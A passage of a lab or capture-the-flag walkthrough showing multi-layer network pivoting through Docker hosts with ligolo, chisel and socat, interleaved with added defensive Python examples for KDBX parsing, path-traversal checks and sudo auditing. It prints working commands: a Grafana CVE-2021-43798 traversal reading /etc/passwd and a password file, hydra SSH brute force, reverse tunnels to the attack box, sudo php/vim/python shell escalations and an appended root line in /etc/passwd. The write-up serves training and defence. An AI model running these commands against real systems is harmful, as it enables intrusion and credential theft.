seller@851709aee958:~$ sudo /usr/bin/php -r "system('/bin/bash');"
root@851709aee958:/home/seller# id
uid=0(root) gid=0(root) groups=0(root)

But where is that backup file?

Ligolo, second layer

Never mind, let's get to the next layer first.

Set up another layer of TUN tunnel proxy.

Because the default port 11601 was used above, this time a port must be specified.

sudo ./proxy -selfcert -laddr 0.0.0.0:11602
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11602
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » interface_create --name "ligolo2"
INFO[0043] Creating a new "ligolo2" interface...
INFO[0043] Interface created!
ligolo-ng » INFO[0060] Agent joined. id=d5dc2b89-b8fe-4089-964a-1fdd470e8cfb name=root@851709aee958 remote="192.168.60.191:55456"
ligolo-ng » session
? Specify a session : 1 - root@851709aee958 - 192.168.60.191:55456 - d5dc2b89-b8fe-4089-964a-1fdd470e8cfb
[Agent : root@851709aee958] » tunnel_start --tun ligolo2
[Agent : root@851709aee958] » INFO[0095] Starting tunnel to root@851709aee958 (d5dc2b89-b8fe-4089-964a-1fdd470e8cfb)
----------
# Run on the target
root@851709aee958:/tmp# wget 192.168.60.100/agent
--2025-02-18 13:43:23-- http://192.168.60.100/agent
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6033408 (5.8M) [application/octet-stream]
Saving to: 'agent'

agent 100%[=======================================================================>] 5.75M --.-KB/s in 0.05s

2025-02-18 13:43:23 (126 MB/s) - 'agent' saved [6033408/6033408]

root@851709aee958:/tmp# chmod +x agent
root@851709aee958:/tmp# ./agent -connect 192.168.60.100:11602 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.60.100:11602"

Scan the ports.

sudo fscan -h 20.20.20.3
[sudo] password for Pepster:

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 20.20.20.3:22
[+] 端口开放 20.20.20.3:21
[+] 端口开放 20.20.20.3:3000
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[+] ftp 20.20.20.3:21:anonymous
[->]mantenimiento
[*] 网站标题 http://20.20.20.3:3000 状态码:302 长度:29 标题:无标题 重定向地址: http://20.20.20.3:3000/login
[*] 网站标题 http://20.20.20.3:3000/login 状态码:200 长度:27909 标题:Grafana
[!] 扫描错误 20.20.20.3:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 9.001886562s

Note: don't scan host 20.20.20.2 here; that host is the second-layer host, not the third-layer one.

Found a maintenance.html.

❯ gobuster dir -u http://20.20.20.3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://20.20.20.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/index.html (Status: 200) [Size: 10701]
/maintenance.html (Status: 200) [Size: 63]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

curl the page; it gives a hint.

❯ curl http://20.20.20.3/maintenance.html
<h1>Website under maintenance, access is in /tmp/pass.txt</h1>

Port 21 is open; try anonymous login.

There is a kdbx file inside.

❯ ftp [email protected]
Connected to 20.20.20.3.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||64180|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Mar 29 2024 mantenimiento
226 Directory send OK.
ftp> cd mantenimiento
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||9345|)
150 Here comes the directory listing.
-rwxrwxrwx 1 0 0 2021 Mar 29 2024 database.kdbx
226 Directory send OK.
ftp> get database.kdbx
local: database.kdbx remote: database.kdbx
229 Entering Extended Passive Mode (|||56600|)
150 Opening BINARY mode data connection for database.kdbx (2021 bytes).
100% |*********************************************************************************************************| 2021 0.99 MiB/s 00:00 ETA
226 Transfer complete.
2021 bytes received in 00:00 (574.89 KiB/s)
ftp> exit
221 Goodbye.

When I try to crack it, john turns out not to support this version.

❯ keepass2john database.kdbx>hash
! database.kdbx : File version '40000' is currently not supported!
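The keepass2john error is more informative than it looks: the version it prints, 40000, is the hexadecimal header field 0x00040000, i.e. major version 4, minor 0. KDBX 4 changed the outer header (4-byte field lengths, KDF parameters in a variant dictionary, Argon2 support), which the keepass2john build used here did not handle. As an added example, not code from the post or from the john project, this parser reads the signatures, the version and the outer header fields of a KDBX file; the two sample headers are constructed inline, and the cipher UUIDs are the ones published in the KeePass source.

```python
"""Read the outer header of a KeePass KDBX file (added example, not the post's code)."""
import struct

SIG1 = 0x9AA2D903                     # first signature, shared by all KeePass formats
SIG2 = {0xB54BFB65: "KDB (KeePass 1.x)", 0xB54BFB66: "KDBX pre-release", 0xB54BFB67: "KDBX"}
# Cipher UUIDs as stored in the header (byte order as written by KeePass).
CIPHERS = {
    bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"): "AES-256-CBC",
    bytes.fromhex("d6038a2b8b6f4cb5a524339a31dbb59a"): "ChaCha20",
}
END_OF_HEADER, CIPHER_ID = 0x00, 0x02


def parse_kdbx_header(data):
    """Return format, (major, minor) version, cipher and header length, or raise ValueError."""
    if len(data) < 12:
        raise ValueError("too short for a KDBX header")
    sig1, sig2, version = struct.unpack_from("<III", data, 0)
    if sig1 != SIG1 or sig2 not in SIG2:
        raise ValueError("not a KeePass database")
    if sig2 == 0xB54BFB65:
        raise ValueError("legacy .kdb container has no KDBX header")
    major, minor = version >> 16, version & 0xFFFF     # 0x00040000 -> (4, 0)
    # KDBX 4 widened the per-field length prefix from 2 to 4 bytes.
    len_fmt, len_size = ("<I", 4) if major >= 4 else ("<H", 2)
    fields, pos = {}, 12
    while True:
        if pos + 1 + len_size > len(data):
            raise ValueError("truncated header")
        field_id = data[pos]
        (length,) = struct.unpack_from(len_fmt, data, pos + 1)
        start = pos + 1 + len_size
        value = data[start:start + length]
        if len(value) != length:
            raise ValueError("truncated header field 0x%02x" % field_id)
        fields[field_id] = value
        pos = start + length
        if field_id == END_OF_HEADER:
            break
    return {
        "format": SIG2[sig2],
        "major": major,
        "minor": minor,
        "cipher": CIPHERS.get(fields.get(CIPHER_ID), "unknown"),
        "header_end": pos,
    }


def build_header(major, minor, cipher_uuid):
    """Construct a minimal outer header (CipherID + EndOfHeader); sample data for the demo only."""
    len_fmt = "<I" if major >= 4 else "<H"
    return (struct.pack("<III", SIG1, 0xB54BFB67, (major << 16) | minor)
            + bytes([CIPHER_ID]) + struct.pack(len_fmt, 16) + cipher_uuid
            + bytes([END_OF_HEADER]) + struct.pack(len_fmt, 4) + b"\r\n\r\n")


# Constructed sample headers: a KDBX 4.0 file like the one keepass2john rejected, and a KDBX 3.1 file.
SAMPLE_KDBX4 = build_header(4, 0, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))
SAMPLE_KDBX3 = build_header(3, 1, bytes.fromhex("d6038a2b8b6f4cb5a524339a31dbb59a"))

if __name__ == "__main__":
    for sample in (SAMPLE_KDBX4, SAMPLE_KDBX3):
        print(parse_kdbx_header(sample))
```

For a defender the version is the useful signal: a KDBX 4 database with an Argon2 KDF is markedly more expensive to guess against than a KDBX 3 file with AES-KDF, which is why an Argon2-aware cracker needs to be in the toolbox before judging whether a leaked vault is at risk.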

Change direction; open port 3000 in the browser.

Try logging in with the weak password admin:admin.

LFI file read

Hey, what a coincidence, isn't this the one with the file read vulnerability I ran into before?

Grafana 8.3.0 - Directory Traversal and Arbitrary File Read - Multiple webapps Exploit

TheHackersLabs-Incertidumbre-Walkthrough | Pepster’Blog

Install the Python libraries it needs.

Got the user freddy.

cd exploit-grafana-CVE-2021-43798
❯ python3 exploit.py
_____ _____ ___ __ ___ _ _ _ ________ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |___| | |__ /__ / _ ( _ )
| (__ \ V /| _|___/ / () / /| |___|_ _|_ \ / /\_, / _ \
\___| \_/ |___| /___\__/___|_| |_|___//_/ /_/\___/
@pedrohavay / @acassio22

? Enter the target list: targets.txt

========================================

[i] Target: http://20.20.20.3:3000

[!] Payload "http://20.20.20.3:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" works.

[i] Analysing files...

[i] File "/conf/defaults.ini" found in server.
[*] File saved in "./http_20_20_20_3_3000/defaults.ini".

[i] File "/etc/grafana/grafana.ini" found in server.
[*] File saved in "./http_20_20_20_3_3000/grafana.ini".

[i] File "/etc/passwd" found in server.
[*] File saved in "./http_20_20_20_3_3000/passwd".

[i] File "/var/lib/grafana/grafana.db" found in server.
[*] File saved in "./http_20_20_20_3_3000/grafana.db".

[i] File "/proc/self/cmdline" found in server.
[*] File saved in "./http_20_20_20_3_3000/cmdline".

? Do you want to try to extract the passwords from the data source? Yes

[i] Secret Key: SW2YcwTIb9zpOOhoPsMm

[*] Bye Bye!
cat passwd|grep /bin/bash
cat: passwd: No such file or directory
cat http_20_20_20_3_3000/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
freddy:x:1000:1000::/home/freddy:/bin/bash

Tried brute-forcing SSH with this user; no result.

Oh, I forgot there was a hint earlier.

Use the payload to try to read /tmp/pass.txt.

❯ curl http://20.20.20.3:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp/pass.txt
t9sH76gpQ82UFeZ3GXZS
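The `?archivo=` parameter on the second-layer shop and the Grafana `..%2f` traversal here fail the same way: a user-supplied name is joined to a directory without checking where the result ends up, and in Grafana's case the path normalisation saw the still-encoded `..%2f` segments and let them through. As an added example, not code from the post or from either project, `resolve_under` shows the containment check a file-serving handler needs (decode to a fixed point first, then verify the resolved path is still inside the base), and `looks_like_traversal` is the matching log-side test; the base directory and the request values are constructed.

```python
"""Contain user-supplied file names inside a base directory, and spot traversal probes (added example)."""
import os
import re
from urllib.parse import unquote

# A ".." path segment introduced at the start, after a slash, or after a query "=" or "&".
TRAVERSAL_RE = re.compile(r"(?:^|[/=&\\])\.\.(?:[/\\]|$)")


def fully_decode(value, rounds=3):
    """Percent-decode until stable so ..%2f and ..%252f both become ../ before any check."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_under(base_dir, requested):
    """Return `requested` as a path relative to base_dir, or None if it would escape it.

    This is the check the vulnerable `?archivo=` handler lacked: the decoded name is joined
    to the base, resolved (symlinks and .. collapsed), and accepted only if it still sits
    strictly inside the base directory.
    """
    name = fully_decode(requested)
    if not name or "\x00" in name or name.startswith(("/", "\\")):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return os.path.relpath(candidate, base)


def looks_like_traversal(raw):
    """Detection side: true if a URL or parameter decodes to a parent-directory step."""
    return TRAVERSAL_RE.search(fully_decode(raw)) is not None


if __name__ == "__main__":
    base = "/srv/shop/img"   # hypothetical image directory used for the demo
    for req in ("banner.png", "sub/../banner.png", "../../../../../etc/passwd",
                "..%2f..%2f..%2fetc%2fpasswd", "..%252f..%252fetc%252fpasswd", "/etc/passwd"):
        print(f"{req:34} -> {resolve_under(base, req)}")
    print(looks_like_traversal("/public/plugins/alertlist/..%2f..%2f..%2f..%2fetc/passwd"))
```

Decoding to a fixed point before normalising is the step that matters for the Grafana case; an allow-list of known file names is a stronger design than any path check when the set of servable files is small, as it is for a shop's product images.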

Use this password to open the KeePass file online.

KeeWeb

Got the credentials freddy:t9sH76gpQ82UFeZ3GXZS

Try connecting.

Found a sudo privilege.

❯ ssh [email protected]
The authenticity of host '20.20.20.3 (20.20.20.3)' can't be established.
ED25519 key fingerprint is SHA256:vI77ttzFmsp8NiCsxBpeZipRCZ9MdfkeMJojz7qMiTw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '20.20.20.3' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux e1a741f99a71 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
┏━(Message from Kali developers)

┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/

┗━(Run: “touch ~/.hushlogin” to hide this message)
┌──(freddy㉿e1a741f99a71)-[~]
└─$ ls -al
total 52
drwxr-xr-x 1 freddy freddy 4096 Mar 29 2024 .
drwxr-xr-x 1 root root 4096 Mar 29 2024 ..
-rw-r--r-- 1 freddy freddy 220 Nov 26 2023 .bash_logout
-rw-r--r-- 1 freddy freddy 5551 Mar 24 2024 .bashrc
-rw-r--r-- 1 freddy freddy 3526 Nov 26 2023 .bashrc.original
drwxr-xr-x 3 freddy freddy 4096 Mar 24 2024 .config
drwxr-xr-x 3 freddy freddy 4096 Mar 24 2024 .java
-rw-r--r-- 1 freddy freddy 807 Nov 26 2023 .profile
-rw-r--r-- 1 freddy freddy 10868 Feb 16 2024 .zshrc
drwxr-xr-x 2 root root 4096 Mar 29 2024 Desktop

┌──(freddy㉿e1a741f99a71)-[~]
└─$ sudo -l
Matching Defaults entries for freddy on e1a741f99a71:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User freddy may run the following commands on e1a741f99a71:
(ALL) NOPASSWD: /usr/bin/python3 /opt/maintenance.py

This file is owned by the current user.

Try using Python to spawn a pseudo-terminal to escalate privileges.

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ ls -al
total 12
drwxrwxrwx 1 root root 4096 Mar 29 2024 .
drwxr-xr-x 1 root root 4096 Feb 18 11:35 ..
-rw-r--r-- 1 freddy freddy 35 Mar 29 2024 maintenance.py

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ cat maintenance.py
print("Server under beta testing")

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ echo "import pty;pty.spawn('/bin/bash')">maintenance.py

┌──(freddy㉿e1a741f99a71)-[/opt]
└─$ sudo /usr/bin/python3 /opt/maintenance.py

┌──(root㉿e1a741f99a71)-[/opt]
└─#
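Both escalations in this write-up come from the same sudoers pattern: a NOPASSWD rule that names an interpreter with no fixed arguments (php on the second container), or a script the invoking user can modify (maintenance.py, owned by freddy, sitting in a world-writable /opt on the third). As an added example, not code from the post, this audit parses `sudo -l` output and flags both conditions using the file mode bits that sudo itself never checks; the `sudo -l` text is constructed, and the script is created in a temporary directory so the check runs anywhere.

```python
"""Audit `sudo -l` output for rules that hand over root (added example, not the post's code)."""
import os
import re
import stat
import tempfile

# Constructed `sudo -l` output mirroring the two rules seen on the containers above;
# {script} is filled in with a temporary file so the demo runs anywhere.
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, use_pty

User user may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/php
    (ALL) NOPASSWD: /usr/bin/python3 {script}
"""

# Binaries that give an interactive shell or arbitrary code when run without fixed arguments.
INTERPRETERS = {"php", "python", "python2", "python3", "perl", "ruby", "node", "bash", "sh",
                "zsh", "vim", "vi", "less", "more", "awk", "find", "env"}
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_sudo_l(text):
    """Return [{'runas', 'tags', 'cmd'}] for the command lines of a `sudo -l` listing."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = RULE_RE.match(line) if in_commands else None
        if m:
            rules.append({"runas": m["runas"].strip(),
                          "tags": set(re.findall(r"[A-Z_]+", m["tags"])),
                          "cmd": m["cmd"]})
    return rules


def writable_by(path, uid, gids):
    """True if uid (or one of gids, or everyone) may write `path` according to its mode bits."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool((st.st_uid == uid and st.st_mode & stat.S_IWUSR)
                or (st.st_gid in gids and st.st_mode & stat.S_IWGRP)
                or st.st_mode & stat.S_IWOTH)


def audit(rules, uid, gids):
    """Return (cmd, reason) findings for rules that are equivalent to unrestricted root."""
    findings = []
    for rule in rules:
        argv = rule["cmd"].split()
        if not argv or argv[0] == "ALL":
            findings.append((rule["cmd"], "any command permitted"))
            continue
        binary = os.path.basename(argv[0])
        if len(argv) == 1 and binary in INTERPRETERS:
            findings.append((rule["cmd"], f"interpreter or shell {binary} with free arguments"))
        for arg in argv[1:]:
            if not arg.startswith("/"):
                continue
            if writable_by(arg, uid, gids):
                findings.append((rule["cmd"], f"argument {arg} is writable by the invoking user"))
            elif writable_by(os.path.dirname(arg), uid, gids):
                findings.append((rule["cmd"], f"directory of {arg} is writable; the file can be replaced"))
    return findings


def demo():
    """Build the scenario from the walkthrough with a temporary script owned by the current user."""
    script = os.path.join(tempfile.mkdtemp(), "maintenance.py")
    with open(script, "w") as fh:
        fh.write('print("Server under beta testing")\n')
    os.chmod(script, 0o644)            # owner-writable, like the real file in the post
    rules = parse_sudo_l(SAMPLE_SUDO_L.format(script=script))
    uid = os.getuid() if hasattr(os, "getuid") else -1
    gids = set(os.getgroups()) if hasattr(os, "getgroups") else set()
    return audit(rules, uid, gids)


if __name__ == "__main__":
    for cmd, reason in demo():
        print(f"{cmd:45} {reason}")
```

The fix for the script case is ownership, not sudoers syntax: a root-owned file (mode 0644) in a root-owned, non-writable directory means the rule really does restrict freddy to that one script. For the interpreter case there is no safe form of `NOPASSWD: /usr/bin/php`; the rule has to name a specific script or be removed.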

Why do I feel like getting root is useless here; a pure waste of my time 😠

Chisel, third layer

Go straight to another TUN tunnel into the internal network.

This Docker container runs Kali, and it's way too bare.

There isn't even a ping command.

Not sure why wget can't reach my Kali.

I use scp to transfer a busybox.

┌──(root㉿e1a741f99a71)-[/tmp]
└─# wget 192.168.60.100/linpeas.sh
--2025-02-18 15:08:54-- http://192.168.60.100/linpeas.sh
Connecting to 192.168.60.100:80... failed: Network is unreachable.
❯ scp busybox [email protected]:/tmp
[email protected]'s password:
busybox

Oh, I think I get it.

No wonder it can't ping my Kali; it connects through the second-layer host.

┌──(root㉿e1a741f99a71)-[/tmp]
└─# last
freddy pts/0 20.20.20.2 Tue Feb 18 15:18 still logged in
freddy pts/0 20.20.20.2 Tue Feb 18 15:09 - 15:18 (00:08)
freddy pts/0 20.20.20.2 Tue Feb 18 14:53 - 15:09 (00:16)

wtmp begins Tue Feb 18 14:53:37 2025

So a port can be listened on the 20.20.20.2 host and all traffic forwarded to Kali.

I try to use ligolo to open a TUN virtual interface on the target.

But given that the second-layer target is in Docker, it cannot be opened.

So use socat together with chisel.

By now I have 8 terminal windows open.

Note that the chisel server and client versions need to match.

## On the second-layer host (seller user), forward all traffic received on port 2222 to Kali's port 1111
root@851709aee958:/tmp# wget 192.168.60.100/socat
--2025-02-18 15:32:30-- http://192.168.60.100/socat
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 473256 (462K) [application/octet-stream]
Saving to: 'socat'

socat 100%[===============================>] 462.16K --.-KB/s in 0.009s

2025-02-18 15:32:30 (52.4 MB/s) - 'socat' saved [473256/473256]

root@851709aee958:/tmp# chmod +x socat
root@851709aee958:/tmp# ./socat tcp-l:2222,fork,reuseaddr tcp:192.168.60.100:1111 &
[2] 13650
--------------------------
## On the third-layer host (freddy user), client mode, forward socks to 2222
❯ scp chisel [email protected]:/tmp
[email protected]'s password:
┌──(freddy㉿e1a741f99a71)-[~]
└─$ sudo /usr/bin/python3 /opt/maintenance.py
┌──(root㉿e1a741f99a71)-[/home/freddy]
└─# cd /tmp/
┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./chisel client 20.20.20.2:2222 R:socks&
--------------------------
## chisel server mode on the Kali host
❯ ./chisel server --reverse -p 1111 &
2025/02/19 00:43:54 server: Reverse tunnelling enabled
2025/02/19 00:43:54 server: Fingerprint fMD70hoZaeUeKI+1nPF+qQrsQ6g/e0ZIe5LdaniA9IU=
2025/02/19 00:43:54 server: Listening on http://0.0.0.0:1111
2025/02/19 00:44:08 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

That establishes the SOCKS5 connection

I'm borrowing someone else's port-scan screenshot here; on my side I can't see port 80 and don't know how to fix that

Scan for directories

❯ gobuster dir -u http://30.30.30.3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404 --proxy socks5:127.0.0.1:1080
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://30.30.30.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] Proxy: socks5:127.0.0.1:1080
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/index.html (Status: 200) [Size: 10701]
/secret.php (Status: 200) [Size: 927]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

There's a /secret.php

Open it in Firefox, remembering to configure SOCKS5

Got a user: Mario

Hydra brute force

Try brute-forcing with hydra

It ran for ages with no result; turns out the username is lowercase

Got the password: chocolate

❯ proxychains hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://30.30.30.3 -I -force
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 01:24:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://30.30.30.3:22/

[22][ssh] host: 30.30.30.3 login: mario password: chocolate
[STATUS] attack finished for 30.30.30.3 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-19 01:25:06

Try logging in via SSH; there's sudo permission for vim

Check the local IP and pivot again

❯ proxychains ssh [email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 30.30.30.3:22 ... OK
The authenticity of host '30.30.30.3 (30.30.30.3)' can't be established.
ED25519 key fingerprint is SHA256:z6uc1wEgwh6GGiDrEIM8ABQT1LGC4CfYAYnV4GXRUVE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '30.30.30.3' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux c5f63887b9e9 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Mar 20 09:54:46 2024 from 192.168.0.21
mario@c5f63887b9e9:~$
mario@c5f63887b9e9:~$ sudo -l
[sudo] password for mario:
Matching Defaults entries for mario on c5f63887b9e9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User mario may run the following commands on c5f63887b9e9:
(ALL) /usr/bin/vim
mario@c5f63887b9e9:~$ hostname -I
30.30.30.3 40.40.40.2

First escalate to root and check for any sensitive information

Nothing at all; escalated for nothing 😅

mario@c5f63887b9e9:~$ sudo vim
[sudo] password for mario:

root@c5f63887b9e9:/home/mario# id
uid=0(root) gid=0(root) groups=0(root)
root@c5f63887b9e9:/home/mario# echo "primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash">>/etc/passwd
root@c5f63887b9e9:/home/mario# exit
exit

Press ENTER or type command to continue
mario@c5f63887b9e9:~$ su primary
Password:
root@c5f63887b9e9:/home/mario#
root@c5f63887b9e9:~# ls -al
total 32
drwx------ 1 root root 4096 Feb 19 05:37 .
drwxr-xr-x 1 root root 4096 Feb 18 11:35 ..
-rw------- 1 root root 71 Feb 19 05:37 .bash_history
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Mar 20 2024 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw------- 1 root root 0 Apr 21 2024 .python_history
drwx------ 2 root root 4096 Mar 20 2024 .ssh
-rw------- 1 root root 599 Feb 19 05:37 .viminfo

Chisel: layer four

Use scp to transfer chisel to the layer-4 mario host

And socat to the layer-3 freddy host

❯ proxychains scp chisel [email protected]:/tmp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 30.30.30.3:22 ... OK
[email protected]'s password:
chisel 100% 9152KB 16.0MB/s 00:00
❯ scp /var/www/html/socat [email protected]:/tmp
[email protected]'s password:
socat

This way socat forwards the SOCKS traffic to 20.20.20.2

The 20.20.20.2 host forwards the traffic on to Kali

## Run on the layer-3 freddy host
┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:20.20.20.2:3333,reuseaddr&
## Run on the layer-2 seller host
root@851709aee958:/tmp# ./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:192.168.60.100:2222,reuseaddr&
## Run on the layer-4 mario host
mario@c5f63887b9e9:/tmp$ ./chisel client 30.30.30.2:3333 R:1234:socks&
[1] 1090
## Run on the Kali attack box
❯ ./chisel server --reverse -p 2222
2025/02/19 14:04:51 server: Reverse tunnelling enabled
2025/02/19 14:04:51 server: Fingerprint GKuvwsyJYnMuLplBfDZOp732D6fJ8/DlpJLL6y8pH7g=
2025/02/19 14:04:51 server: Listening on http://0.0.0.0:2222
2025/02/19 14:04:53 server: session#1: tun: proxy#R:127.0.0.1:1234=>socks: Listening

Edit the proxychains4 config file

sudo vim /etc/proxychains4.conf
[sudo] password for Pepster:
socks5 127.0.0.1 1234

A quick port scan; not sure whether the rate is too high,

which leaves the scan incomplete

I'll assume only port 80 is open

❯ proxychains rustscan -a 40.40.40.3 2>/dev/null
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
